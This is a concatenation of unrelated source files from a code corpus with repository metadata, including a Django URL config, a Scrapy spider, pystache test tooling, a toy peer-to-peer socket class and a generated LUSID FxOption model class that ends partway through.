e3f89f91d8c69abb44601e70897a53673388b28d | 87fdd8850df131b1f5df60ecad781ce0e79b1d28 | /models4CWProject/models4CWProject/urls.py | c80e8822580ca1366f5b958b11c6c5ceffeca4e2 | [] | no_license | cs-fullstack-2019-spring/django-models4-cw-Joshtg1104 | 3e1094fca12df27abbed756b137ff5f8d14a730c | 7a3e1e8a6e965ad63f9a9cc1799f55a89aa9f4d6 | refs/heads/master | 2020-04-24T12:09:08.907751 | 2019-02-24T22:17:19 | 2019-02-24T22:17:19 | 171,947,722 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 808 | py | """models4CWProject URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/dev/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: path('', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.urls import include, path
2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))
"""
from django.contrib import admin
from django.urls import include, path
urlpatterns = [
path('admin/', admin.site.urls),
path('', include('models4App.urls'))
]
| [
"[email protected]"
] | |
300abebbed2333e357357a47e73f19850524efd9 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/392/usersdata/310/71048/submittedfiles/formula.py | ea9ddc63827097528e7fa6c3641fd8e29889c94f | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 208 | py | # -*- coding: utf-8 -*-
# STARTING
p = float(input('Digite o valor de p: '))
i = float(input('Digite o valor de i: '))
n = float(input('Digite o valor de n: '))
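# future value of an ordinary annuity: v = p * (((1 + i)**n - 1) / i)
# (p = payment per period, i = interest rate per period, n = number of periods)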
v = p*((((1+i)**n)-1)/i)
print ('%.2f' %v )
| [
"[email protected]"
] | |
513c734e5f42fa3c0906eb3309cba7ef169d6c1b | a7da58ad91b007b3650003708eb91928f1e3684a | /bt5/erp5_pdm/SkinTemplateItem/portal_skins/erp5_pdm/SupplyLine_init.py | c4b6e6d09c91538afb94bb6ecf72091943ac25a9 | [] | no_license | jgpjuniorj/j | 042d1bd7710fa2830355d4312a6b76103e29639d | dc02bfa887ffab9841abebc3f5c16d874388cef5 | refs/heads/master | 2021-01-01T09:26:36.121339 | 2020-01-31T10:34:17 | 2020-02-07T04:39:18 | 239,214,398 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 569 | py | # XXX Set a resource for the supply line inside a resource
parent_value = context.getParentValue()
if parent_value.getPortalType() in context.getPortalResourceTypeList():
context.setResourceValue(parent_value)
# Predicate ?
context.setMappedValuePropertyList([
'base_price', 'additional_price',
'discount_ratio', 'exclusive_discount_ratio',
'surcharge_ratio', 'variable_additional_price',
'non_discountable_additional_price',
'priced_quantity', 'base_unit_price',
])
| [
"[email protected]"
] | |
2d157e6b043c49bbf4392ba1010da1ab43617f94 | 1698fe3ff15a6737c70501741b32b24fe68052f4 | /py-elasticsearch-django-master/spider/ESearch/spiders/haoyang_spider.py | a227d4b4b41603f8a992a695342ceb534df4a4bb | [] | no_license | menhswu/djangoapps | 4f3718244c8678640af2d2a095d20a405e337884 | 039a42aa9d1537e7beb4071d86bea7a42253d8b3 | refs/heads/master | 2023-03-04T03:56:01.070921 | 2021-01-28T07:35:02 | 2021-01-28T07:35:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,937 | py | # -*- coding:utf-8 -*-
import scrapy
import re
import urllib2
from scrapy.http import Request
from scrapy import Selector
from ESearch.items import XiangmuItem
from ESearch.utils.common import get_md5
# 32406
class DmozSpider(scrapy.Spider):
name = "haoyang"
start_urls = []
main_url = "http://www.9lizhi.com"
def start_requests(self):
file_object = open(r'haoyang_url.csv', 'r')
try:
for line in file_object:
x = line.strip()
self.start_urls.append(x)
for url in self.start_urls:
yield self.make_requests_from_url(url)
finally:
file_object.close()
def parse(self, response):
item = XiangmuItem()
item["book_name"] = ''
item["book_author"] = ''
item["book_type"] = ''
item["book_format"] = ''
item["book_time"] = ''
item["book_url"] = ''
item["book_size"] = ''
item["book_downl_url"] = ''
item["book_source"] = ''
item["book_intro"] = ''
item["book_content"] = ''
item["book_zip_pswd"] = ''
item["book_chinese"] = ''
item["book_id"] = ''
selector = Selector(response)
is_lists_page = selector.xpath('//ul[@id="resultsContainer"]')
if is_lists_page:
info_lists = is_lists_page.xpath('li/div[@class="item_title"]/strong/h2/a/@href').extract()
for each in info_lists:
yield Request(each, callback=self.parse)
page_lists = is_lists_page.xpath('//select[@name="select"]/option/@value').extract()
for each_page in page_lists[1:-1]:
yield Request(self.main_url + each_page, callback=self.parse)
pass
is_info_page = selector.xpath('//div[@id="detail"]')
if is_info_page:
item['book_url'] = response.url
item['book_id'] = get_md5(response.url)
item['book_downl_url'] = response.url
type = selector.xpath('//div[@class="posi"]/a/text()').extract()
type_url = selector.xpath('//div[@class="posi"]/a/@href').extract()
if "http://www" in type_url[-1]:
item['book_type'] = type[-2]
else:
item['book_type'] = type[-1]
information = is_info_page.xpath('div[@class="tb-detail-hd"]')
item['book_name'] = information.xpath('h1/text()').extract()
time = information.xpath('li[@class="dated"]/span[@class="datetime"]/text()').extract()
time = ''.join(time).split(':')[-1]
item['book_time'] = time
author = information.xpath('li[@class="dated"]/span[@class="author"]/text()').extract()
item['book_author'] = ''.join(author).replace('\r', '').replace('\n', '')
yield item
| [
"[email protected]"
] | |
44b3f8b9bf6336102b52df080e47ad6e0a0e1c8d | 297497957c531d81ba286bc91253fbbb78b4d8be | /third_party/python/gyp/test/win/gyptest-quoting-commands.py | c6e3167e76c582ad10c5852afaa2c21f62439533 | [
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] | permissive | marco-c/gecko-dev-comments-removed | 7a9dd34045b07e6b22f0c636c0a836b9e639f9d3 | 61942784fb157763e65608e5a29b3729b0aa66fa | refs/heads/master | 2023-08-09T18:55:25.895853 | 2023-08-01T00:40:39 | 2023-08-01T00:40:39 | 211,297,481 | 0 | 0 | NOASSERTION | 2019-09-29T01:27:49 | 2019-09-27T10:44:24 | C++ | UTF-8 | Python | false | false | 565 | py |
"""
Make sure batch files run as actions. Regression test for previously missing
trailing quote on command line. cmd typically will implicitly insert a missing
quote, but if the command ends in a quote, it will not insert another, so the
command can sometimes become unterminated.
"""
import TestGyp
import sys
if sys.platform == 'win32':
test = TestGyp.TestGyp(formats=['msvs', 'ninja'])
CHDIR = 'batch-file-action'
test.run_gyp('batch-file-action.gyp', chdir=CHDIR)
test.build('batch-file-action.gyp', test.ALL, chdir=CHDIR)
test.pass_test()
| [
"[email protected]"
] | |
e60bc54cc535f4ab73531ba9f4f5eac45fce071c | 09145b3b07273e0e064a855cf2302220cebcf181 | /textwrap_ex.py | 95b08fe738e17f49e6c04d9e5cc134b0a91c315a | [] | no_license | 01x01/python3-standard-library | 7fa762a12cbcb3535bd8b31128bd9c3aed167e10 | 1af424a04d3f16abf1c6bc42abf80ae357e35920 | refs/heads/master | 2020-06-24T12:23:38.563609 | 2019-08-12T09:42:34 | 2019-08-12T09:42:34 | 168,808,293 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,217 | py | # coding: utf-8
# paragraph formatting for text
# main feature: programmatic wrap/fill functionality similar to what text editors offer
# the sample text
sample_text = '''The textwrap module can be used to format text for output in
situations where pretty-printing is desired. It offers
programmatic functionality similar to the paragraph wrapping
or filling features found in many text editors.
'''
# summary of textwrap functions
# wrap(text, width=70, **kw): returns a list, one wrapped line per element
# fill(text, width=70, **kw): like wrap, but returns a single string (initial_indent indents the first line)
# shorten(text, width, **kw): collapses whitespace and truncates to width, for summaries
# dedent(text): removes common leading whitespace
# indent(text, prefix, predicate=None): prepends prefix to selected lines
# wrap
import textwrap
t1 = textwrap.wrap(sample_text)
print(t1)
# fill
t2 = textwrap.fill(sample_text,initial_indent="*"*4)
print(t2)
# shorten
t3 = textwrap.shorten(sample_text,width=10)
print(t3) # The [...]
# dedent
dedent_text = textwrap.dedent(sample_text)
print(dedent_text)
# indent
final = textwrap.indent(sample_text,'>')
print(final)
for width in [45,80]:
print("{} Columns is : \n".format(width))
t = textwrap.fill(sample_text,width=width)
print(t)
t5 = textwrap.fill(sample_text,subsequent_indent="*")
print(t5) | [
"[email protected]"
] | |
b741fb5ad71c5f866583c59b99471308f3687b26 | f3fb46ec8167c3d7e451265a76e1646aef78233f | /world/stat_checks/utils.py | 3d228a15fb3d369bed4b3c54c83fd1a965011308 | [
"MIT"
] | permissive | Arx-Game/arxcode | d1196941db4b551bb8ec96024241787cf4f34af3 | 363a1f14fd1a640580a4bf4486a1afe776757557 | refs/heads/stable_orphan | 2023-08-03T04:27:24.388330 | 2023-07-29T15:10:38 | 2023-07-29T15:10:38 | 144,421,010 | 52 | 45 | MIT | 2023-08-19T00:52:23 | 2018-08-11T22:06:07 | Python | UTF-8 | Python | false | false | 685 | py | """
Just a few utilities. Should NOT import anything in global scope to avoid
circular imports.
"""
def get_check_by_name(name: str):
"""
Convenience method to avoid worrying about circular imports when
fetching checks.
"""
from world.stat_checks.models import StatCheck
check = StatCheck.get_instance_by_name(name)
if not check:
raise StatCheck.DoesNotExist(f"No check exists by name '{name}'")
return check
def get_check_maker_by_name(name: str, character, **kwargs):
from world.stat_checks.check_maker import DefinedCheckMaker
return DefinedCheckMaker(
character=character, check=get_check_by_name(name), **kwargs
)
| [
"[email protected]"
] | |
e9f3f9f51a547f3f2aa65e33127282f566ad08a5 | 39b8aa964883b2bde4349e0c9c38e3233c310548 | /src/Implement Queue using Stacks.py | 421724c0e798d0e25106167e09fd34fd1f92ff3e | [] | no_license | orifake/leetcode-python | 053b82491e0b8d6197dd12d92eec5883211285db | 8e375ebebe0a0285efefc33ed61afb22f41d0c75 | refs/heads/master | 2023-03-09T14:32:17.833456 | 2021-02-26T16:09:31 | 2021-02-26T16:09:31 | 264,466,829 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 846 | py | class MyQueue:
def __init__(self):
"""
Initialize your data structure here.
"""
self.queue = []
def push(self, x: int) -> None:
"""
Push element x to the back of queue.
"""
return self.queue.append(x)
def pop(self) -> int:
"""
Removes the element from in front of queue and returns that element.
"""
return self.queue.pop(0)
def peek(self) -> int:
"""
Get the front element.
"""
return self.queue[0]
def empty(self) -> bool:
"""
Returns whether the queue is empty.
"""
return len(self.queue) == 0
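# Note: the class above backs the queue with a single list, so pop()/peek()
# cost O(n) via list.pop(0). A two-stack variant -- the approach the file name
# refers to, with amortized O(1) pop/peek -- might look like this sketch
# (MyQueueTwoStacks is an illustrative name, not part of the original):
class MyQueueTwoStacks:
    def __init__(self):
        self.inbox = []   # stack receiving pushes
        self.outbox = []  # stack serving pops/peeks in FIFO order
    def push(self, x: int) -> None:
        self.inbox.append(x)
    def _shift(self) -> None:
        # refill outbox only when it is empty; reversing inbox restores FIFO order
        if not self.outbox:
            while self.inbox:
                self.outbox.append(self.inbox.pop())
    def pop(self) -> int:
        self._shift()
        return self.outbox.pop()
    def peek(self) -> int:
        self._shift()
        return self.outbox[-1]
    def empty(self) -> bool:
        return not self.inbox and not self.outbox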
# Your MyQueue object will be instantiated and called as such:
# obj = MyQueue()
# obj.push(x)
# param_2 = obj.pop()
# param_3 = obj.peek()
# param_4 = obj.empty() | [
"[email protected]"
] | |
800bfc292b541e358ca68c9e6c326a8a80714489 | 6581a1c0b04af75ab7d386597ec436bd4937b6df | /pystache/tests/main.py | 7342c91712b8528bdc016eb6c3da6dde4a999216 | [
"MIT"
] | permissive | trenchmortar/pystache | f3ab3263ca0e990176306d3a0de9a4fba441c78f | cc262abf19cd90e34390d5ddb5db30d6f04620fa | refs/heads/master | 2020-04-23T00:33:47.600879 | 2012-04-26T05:49:19 | 2012-04-26T05:49:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,685 | py | # coding: utf-8
"""
Exposes a run_tests() function that runs all tests in the project.
This module is for our test console script.
"""
import os
import sys
import unittest
from unittest import TestProgram
import pystache
from pystache.tests.common import PACKAGE_DIR, PROJECT_DIR, SPEC_TEST_DIR, UNITTEST_FILE_PREFIX
from pystache.tests.common import get_module_names
from pystache.tests.doctesting import get_doctests
from pystache.tests.spectesting import get_spec_tests
# If this command option is present, then the spec test and doctest directories
# will be inserted if not provided.
FROM_SOURCE_OPTION = "--from-source"
def run_tests(sys_argv):
"""
Run all tests in the project.
Arguments:
sys_argv: a reference to sys.argv.
"""
should_source_exist = False
spec_test_dir = None
project_dir = None
if len(sys_argv) > 1 and sys_argv[1] == FROM_SOURCE_OPTION:
should_source_exist = True
sys_argv.pop(1)
# TODO: use logging module
print "pystache: running tests: expecting source: %s" % should_source_exist
try:
# TODO: use optparse command options instead.
spec_test_dir = sys_argv[1]
sys_argv.pop(1)
except IndexError:
if should_source_exist:
spec_test_dir = SPEC_TEST_DIR
try:
# TODO: use optparse command options instead.
project_dir = sys_argv[1]
sys_argv.pop(1)
except IndexError:
if should_source_exist:
project_dir = PROJECT_DIR
if len(sys_argv) <= 1 or sys_argv[-1].startswith("-"):
# Then no explicit module or test names were provided, so
# auto-detect all unit tests.
module_names = _discover_test_modules(PACKAGE_DIR)
sys_argv.extend(module_names)
if project_dir is not None:
# Add the current module for unit tests contained here.
sys_argv.append(__name__)
_PystacheTestProgram._text_doctest_dir = project_dir
_PystacheTestProgram._spec_test_dir = spec_test_dir
SetupTests.project_dir = project_dir
# We pass None for the module because we do not want the unittest
# module to resolve module names relative to a given module.
# (This would require importing all of the unittest modules from
# this module.) See the loadTestsFromName() method of the
# unittest.TestLoader class for more details on this parameter.
_PystacheTestProgram(argv=sys_argv, module=None)
    # No need to return since unittest.main() exits.
def _discover_test_modules(package_dir):
"""
Discover and return a sorted list of the names of unit-test modules.
"""
def is_unittest_module(path):
file_name = os.path.basename(path)
return file_name.startswith(UNITTEST_FILE_PREFIX)
names = get_module_names(package_dir=package_dir, should_include=is_unittest_module)
# This is a sanity check to ensure that the unit-test discovery
# methods are working.
if len(names) < 1:
raise Exception("No unit-test modules found--\n in %s" % package_dir)
return names
class SetupTests(unittest.TestCase):
"""Tests about setup.py."""
project_dir = None
def test_version(self):
"""
Test that setup.py's version matches the package's version.
"""
original_path = list(sys.path)
sys.path.insert(0, self.project_dir)
try:
from setup import VERSION
self.assertEqual(VERSION, pystache.__version__)
finally:
sys.path = original_path
# The function unittest.main() is an alias for unittest.TestProgram's
# constructor. TestProgram's constructor calls self.runTests() as its
# final step, which expects self.test to be set. The constructor sets
# the self.test attribute by calling one of self.testLoader's "loadTests"
# methods prior to calling self.runTests(). Each loadTest method returns
# a unittest.TestSuite instance. Thus, self.test is set to a TestSuite
# instance prior to calling runTests().
class _PystacheTestProgram(TestProgram):
"""
Instantiating an instance of this class runs all tests.
"""
def runTests(self):
# self.test is a unittest.TestSuite instance:
# http://docs.python.org/library/unittest.html#unittest.TestSuite
tests = self.test
if self._text_doctest_dir is not None:
doctest_suites = get_doctests(self._text_doctest_dir)
tests.addTests(doctest_suites)
if self._spec_test_dir is not None:
spec_testcases = get_spec_tests(self._spec_test_dir)
tests.addTests(spec_testcases)
TestProgram.runTests(self)
| [
"[email protected]"
] | |
15f633e272b1b92e4d97a869ad3ba15c12d17163 | b1b86d8528df27d99ed56ed16f1ba15b5ae78661 | /build_isolated/velodyne_pcl/catkin_generated/generate_cached_setup.py | 4f904fedba7e034ad97a16d679350a13b75ec8ee | [] | no_license | gychen-n/match | 8754ac128b43f81e00faf3ab2af160af70a1d4a3 | ec91f19d104aa4a827c9f66d362f94fe44739cad | refs/heads/main | 2023-04-09T19:56:55.507118 | 2021-04-15T13:39:02 | 2021-04-15T13:39:02 | 358,268,746 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,688 | py | # -*- coding: utf-8 -*-
from __future__ import print_function
import os
import stat
import sys
# find the import for catkin's python package - either from source space or from an installed underlay
if os.path.exists(os.path.join('/opt/ros/melodic/share/catkin/cmake', 'catkinConfig.cmake.in')):
sys.path.insert(0, os.path.join('/opt/ros/melodic/share/catkin/cmake', '..', 'python'))
try:
from catkin.environment_cache import generate_environment_script
except ImportError:
# search for catkin package in all workspaces and prepend to path
for workspace in '/home/gyc/match_ws/devel_isolated/velodyne_driver;/home/gyc/match_ws/devel_isolated/velodyne_msgs;/home/gyc/match_ws/devel_isolated/velodyne_laserscan;/home/gyc/match_ws/devel_isolated/velodyne;/home/gyc/match_ws/devel_isolated/slam_gmapping;/home/gyc/match_ws/devel_isolated/simulation_launch;/home/gyc/match_ws/devel_isolated/pointcloud_to_laserscan;/home/gyc/match_ws/devel_isolated/path_rviz_plugin;/home/gyc/match_ws/devel_isolated/path_server;/home/gyc/match_ws/devel_isolated/gmapping;/home/gyc/match_ws/devel_isolated/openslam_gmapping;/home/gyc/match_ws/devel_isolated/navigation;/home/gyc/match_ws/devel_isolated/move_base_flex;/home/gyc/match_ws/devel_isolated/mbf_simple_nav;/home/gyc/match_ws/devel_isolated/mbf_abstract_nav;/home/gyc/match_ws/devel_isolated/mbf_utility;/home/gyc/match_ws/devel_isolated/mbf_msgs;/home/gyc/match_ws/devel_isolated/mbf_abstract_core;/home/gyc/match_ws/devel_isolated/map_server;/home/gyc/match_ws/devel_isolated/location_fusion;/home/gyc/match_ws/devel_isolated/fake_localization;/home/gyc/match_ws/devel_isolated/dashgo_driver;/home/gyc/match_ws/devel_isolated/cartographer_rviz;/home/gyc/match_ws/devel_isolated/cartographer_ros;/home/gyc/match_ws/devel_isolated/cartographer_ros_msgs;/home/gyc/match_ws/devel_isolated/autolabor_test_launch;/home/gyc/match_ws/devel_isolated/autolabor_navigation_launch;/home/gyc/match_ws/devel_isolated/ah100b;/opt/ros/melodic'.split(';'):
python_path = os.path.join(workspace, 'lib/python2.7/dist-packages')
if os.path.isdir(os.path.join(python_path, 'catkin')):
sys.path.insert(0, python_path)
break
from catkin.environment_cache import generate_environment_script
code = generate_environment_script('/home/gyc/match_ws/devel_isolated/velodyne_pcl/env.sh')
output_filename = '/home/gyc/match_ws/build_isolated/velodyne_pcl/catkin_generated/setup_cached.sh'
with open(output_filename, 'w') as f:
# print('Generate script for cached setup "%s"' % output_filename)
f.write('\n'.join(code))
mode = os.stat(output_filename).st_mode
os.chmod(output_filename, mode | stat.S_IXUSR)
| [
"[email protected]"
] | |
413503c12f4dc6734628644e7c8b0fb1e3e15539 | aeec646a9a2feb6fbaac31d4548d9aa09ad125e3 | /peer_module.py | 879a6662404995a3a8da03457bae8f7f63f7be5e | [
"MIT"
] | permissive | hslee1539/p2p | c0a9798e6da54029373ddf3d2b74ff30dc27e567 | c472271eff409ef345f29ef32f562a5f5e00d3ba | refs/heads/master | 2020-07-18T14:45:33.260168 | 2019-09-10T07:45:45 | 2019-09-10T07:45:45 | 206,264,727 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,674 | py | import socket
import threading
import random
from typing import Callable
import p2p
class Peer:
""""""
ip : str
controlPort : int
connectionPorts : list
service : str
peerList : list
maxConnection : int
serverThreads : list
clientThreads : list
serverState : list
running : bool
controlSocket : socket.socket
controlThread : threading.Thread
    def __init__(self, service : str, controlPort : int, connectionPorts : list, peerList = None):
        # avoid the mutable-default-argument pitfall; default to a fresh list
        self.peerList = [] if peerList is None else peerList
self.service = service
self.controlPort = controlPort
self.connectionPorts = connectionPorts
self.maxConnection = len(connectionPorts)
self.ip = socket.gethostbyname(socket.getfqdn())
self.serverState = [False] * self.maxConnection
def start(self):
""""""
self.running = True
self.controlThread = threading.Thread(target=self._controlServer)
self.controlThread.start()
        self.serverThreads = list(self._socketThreadGenerator(self._server))
self.clientThreads = list(self._socketThreadGenerator(self._client))
for serverThread in self.serverThreads:
serverThread.start()
for clientThread in self.clientThreads:
clientThread.start()
    def _socketThreadGenerator(self, target : Callable):
for index in range(self.maxConnection):
yield threading.Thread(target=target, args=(index,))
def _findSleepServerIndex(self):
for i in range(self.maxConnection):
if(self.serverState[i] == False):
return i
return self.maxConnection
def _controlServer(self):
"""컨트롤 서버가 연결 유지가 가능한 포트를 클라이언트에 알려주도록 운영합니다."""
with socket.socket() as sock:
sock.bind((self.ip, self.controlPort))
sock.settimeout(1)
sock.listen()
while(self.running):
try:
clientSocket, address = sock.accept()
except socket.timeout:
continue
clientSocket : socket.socket
try:
clientSocket.sendall(self.service.encode())
retval = clientSocket.recv(1024)
if (self.service == retval.decode()):
clientSocket.sendall(str(self.connectionPorts[self._findSleepServerIndex()]).encode())
except socket.timeout:
pass
finally:
clientSocket.close()
def _server(self, index : int):
""""""
with socket.socket() as sock:
sock.bind((self.ip, self.connectionPorts[index]))
sock.settimeout(1)
sock.listen()
while(self.running):
try:
self.serverState[index] = False
clientSocket, address = sock.accept()
except socket.timeout:
continue
clientSocket : socket.socket
self.serverState[index] = True
try:
clientSocket.sendall(self.service.encode())
                    retval = clientSocket.recv(1024)
                    if (self.service == retval.decode()):
                        pass  # handshake matched; per-connection handling was left unimplemented in the original
except socket.timeout:
pass
finally:
clientSocket.close()
def _serverConnect(self):
        while (self.running):
            pass  # connection-maintenance loop was left unimplemented in the original
def _client(self, index : int):
"""""" | [
"[email protected]"
] | |
7f53a02ffe54ce6ac59ddf141ab26147d828a8de | c79779a1233e95858499143d717a41205932c53d | /pypi_practices/check_readme.py | 87c4304a51e43f77a2ba84c739eb4ed25c7ac8d5 | [
"MIT"
] | permissive | asottile-archive/pypi_practices | a8915fca09619f741f385c000bc98d84f9fd515f | a4da562c471198dd35806c52016fac44bb46c08d | refs/heads/master | 2021-09-15T02:01:34.023997 | 2018-05-24T00:46:27 | 2018-05-24T00:46:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 668 | py | from __future__ import print_function
import os.path
from pypi_practices.errors import FileValidationError
from pypi_practices.make_entry import make_entry
def check_readme(cwd):
readme_path = os.path.join(cwd, 'README.md')
if not os.path.exists(readme_path):
raise FileValidationError(
'README.md',
'File does not exist.',
is_auto_fixable=True,
)
# TODO: attempt to get project name from config
# TODO: attempt to get project name from tox.ini
# TODO: attempt to get project name from setup.py
return 0
entry = make_entry(check_readme)
if __name__ == '__main__':
exit(entry())
| [
"[email protected]"
] | |
6cef9ae7e0a2600c467a578aeb711fdf209a3328 | f72c9e46af5ce5ac738693daf65e67a0962a229a | /sdk/lusid/models/fx_option.py | 6f45a06959519c74da7262d99971e7531c3a0536 | [
"MIT"
] | permissive | finbourne/lusid-sdk-python | db8ce602f8408169f6583783c80ebbef83c77807 | 32fedc00ce5a37a6fe3bd9b9962570a8a9348e48 | refs/heads/master | 2023-08-29T18:22:49.488811 | 2023-08-29T15:57:26 | 2023-08-29T15:57:26 | 125,082,278 | 11 | 11 | NOASSERTION | 2023-04-28T07:16:48 | 2018-03-13T16:31:54 | Python | UTF-8 | Python | false | false | 28,291 | py | # coding: utf-8
"""
LUSID API
FINBOURNE Technology # noqa: E501
The version of the OpenAPI document: 1.0.463
Contact: [email protected]
Generated by: https://openapi-generator.tech
"""
try:
from inspect import getfullargspec
except ImportError:
from inspect import getargspec as getfullargspec
import pprint
import re # noqa: F401
import six
from lusid.configuration import Configuration
class FxOption(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'start_date': 'datetime',
'dom_ccy': 'str',
'dom_amount': 'float',
'fgn_ccy': 'str',
'fgn_amount': 'float',
'strike': 'float',
'barriers': 'list[Barrier]',
'exercise_type': 'str',
'is_call_not_put': 'bool',
'is_delivery_not_cash': 'bool',
'is_payoff_digital': 'bool',
'option_maturity_date': 'datetime',
'option_settlement_date': 'datetime',
'payout_style': 'str',
'premium': 'Premium',
'touches': 'list[Touch]',
'instrument_type': 'str'
}
attribute_map = {
'start_date': 'startDate',
'dom_ccy': 'domCcy',
'dom_amount': 'domAmount',
'fgn_ccy': 'fgnCcy',
'fgn_amount': 'fgnAmount',
'strike': 'strike',
'barriers': 'barriers',
'exercise_type': 'exerciseType',
'is_call_not_put': 'isCallNotPut',
'is_delivery_not_cash': 'isDeliveryNotCash',
'is_payoff_digital': 'isPayoffDigital',
'option_maturity_date': 'optionMaturityDate',
'option_settlement_date': 'optionSettlementDate',
'payout_style': 'payoutStyle',
'premium': 'premium',
'touches': 'touches',
'instrument_type': 'instrumentType'
}
required_map = {
'start_date': 'required',
'dom_ccy': 'required',
'dom_amount': 'optional',
'fgn_ccy': 'required',
'fgn_amount': 'optional',
'strike': 'optional',
'barriers': 'optional',
'exercise_type': 'optional',
'is_call_not_put': 'required',
'is_delivery_not_cash': 'required',
'is_payoff_digital': 'optional',
'option_maturity_date': 'required',
'option_settlement_date': 'required',
'payout_style': 'optional',
'premium': 'optional',
'touches': 'optional',
'instrument_type': 'required'
}
def __init__(self, start_date=None, dom_ccy=None, dom_amount=None, fgn_ccy=None, fgn_amount=None, strike=None, barriers=None, exercise_type=None, is_call_not_put=None, is_delivery_not_cash=None, is_payoff_digital=None, option_maturity_date=None, option_settlement_date=None, payout_style=None, premium=None, touches=None, instrument_type=None, local_vars_configuration=None): # noqa: E501
"""FxOption - a model defined in OpenAPI"
:param start_date: The start date of the instrument. This is normally synonymous with the trade-date. (required)
:type start_date: datetime
:param dom_ccy: The domestic currency of the instrument. (required)
:type dom_ccy: str
:param dom_amount: The Amount of DomCcy that will be exchanged if the option is exercised. This amount should be a positive number, with the Call/Put flag used to indicate direction. The corresponding amount of FgnCcy that will be exchanged is this amount times the strike. Note there is no rounding performed on this computed value. This is an optional field, if not set the option ContractSize will default to 1.
:type dom_amount: float
:param fgn_ccy: The foreign currency of the FX. (required)
:type fgn_ccy: str
:param fgn_amount: For a vanilla FxOption contract, FgnAmount cannot be set. In case of a digital FxOption (IsPayoffDigital==true) a payoff (if the option is in the money) can be either in domestic or in foreign currency - for the latter FgnAmount must be set. Note: It is invalid to have FgnAmount and DomAmount at the same time.
:type fgn_amount: float
:param strike: The strike of the option.
:type strike: float
:param barriers: For a barrier option the list should not be empty. Up to two barriers are supported. An option cannot be at the same time barrier- and touch-option. One (or both) of the lists must be empty.
:type barriers: list[lusid.Barrier]
:param exercise_type: Type of optionality that is present; European, American. Supported string (enumeration) values are: [European, American].
:type exercise_type: str
:param is_call_not_put: True if the option is a call, false if the option is a put. (required)
:type is_call_not_put: bool
:param is_delivery_not_cash: True if the option delivers the FX underlying, False if the option is settled in cash. (required)
:type is_delivery_not_cash: bool
:param is_payoff_digital: By default IsPayoffDigital is false. If IsPayoffDigital=true, the option is 'digital', and the option payoff is 0 or 1 unit of currency, instead of a vanilla CallPayoff=max(spot-strike,0) or PutPayoff=max(strike-spot,0).
:type is_payoff_digital: bool
:param option_maturity_date: The maturity date of the option. (required)
:type option_maturity_date: datetime
:param option_settlement_date: The settlement date of the option. (required)
:type option_settlement_date: datetime
:param payout_style: PayoutStyle for touch options. For options without touch optionality, payoutStyle should not be set. For options with touch optionality (where the touches data has been set), payoutStyle must be defined and cannot be None. Supported string (enumeration) values are: [Deferred, Immediate].
:type payout_style: str
:param premium:
:type premium: lusid.Premium
:param touches: For a touch option the list should not be empty. Up to two touches are supported. An option cannot be at the same time barrier- and touch-option. One (or both) of the lists must be empty.
:type touches: list[lusid.Touch]
:param instrument_type: The available values are: QuotedSecurity, InterestRateSwap, FxForward, Future, ExoticInstrument, FxOption, CreditDefaultSwap, InterestRateSwaption, Bond, EquityOption, FixedLeg, FloatingLeg, BespokeCashFlowsLeg, Unknown, TermDeposit, ContractForDifference, EquitySwap, CashPerpetual, CapFloor, CashSettled, CdsIndex, Basket, FundingLeg, FxSwap, ForwardRateAgreement, SimpleInstrument, Repo, Equity, ExchangeTradedOption, ReferenceInstrument, ComplexBond, InflationLinkedBond, InflationSwap, SimpleCashFlowLoan (required)
:type instrument_type: str
""" # noqa: E501
if local_vars_configuration is None:
local_vars_configuration = Configuration.get_default_copy()
self.local_vars_configuration = local_vars_configuration
self._start_date = None
self._dom_ccy = None
self._dom_amount = None
self._fgn_ccy = None
self._fgn_amount = None
self._strike = None
self._barriers = None
self._exercise_type = None
self._is_call_not_put = None
self._is_delivery_not_cash = None
self._is_payoff_digital = None
self._option_maturity_date = None
self._option_settlement_date = None
self._payout_style = None
self._premium = None
self._touches = None
self._instrument_type = None
self.discriminator = None
self.start_date = start_date
self.dom_ccy = dom_ccy
self.dom_amount = dom_amount
self.fgn_ccy = fgn_ccy
self.fgn_amount = fgn_amount
self.strike = strike
self.barriers = barriers
self.exercise_type = exercise_type
self.is_call_not_put = is_call_not_put
self.is_delivery_not_cash = is_delivery_not_cash
if is_payoff_digital is not None:
self.is_payoff_digital = is_payoff_digital
self.option_maturity_date = option_maturity_date
self.option_settlement_date = option_settlement_date
self.payout_style = payout_style
if premium is not None:
self.premium = premium
self.touches = touches
self.instrument_type = instrument_type
@property
def start_date(self):
"""Gets the start_date of this FxOption. # noqa: E501
The start date of the instrument. This is normally synonymous with the trade-date. # noqa: E501
:return: The start_date of this FxOption. # noqa: E501
:rtype: datetime
"""
return self._start_date
@start_date.setter
def start_date(self, start_date):
"""Sets the start_date of this FxOption.
The start date of the instrument. This is normally synonymous with the trade-date. # noqa: E501
:param start_date: The start_date of this FxOption. # noqa: E501
:type start_date: datetime
"""
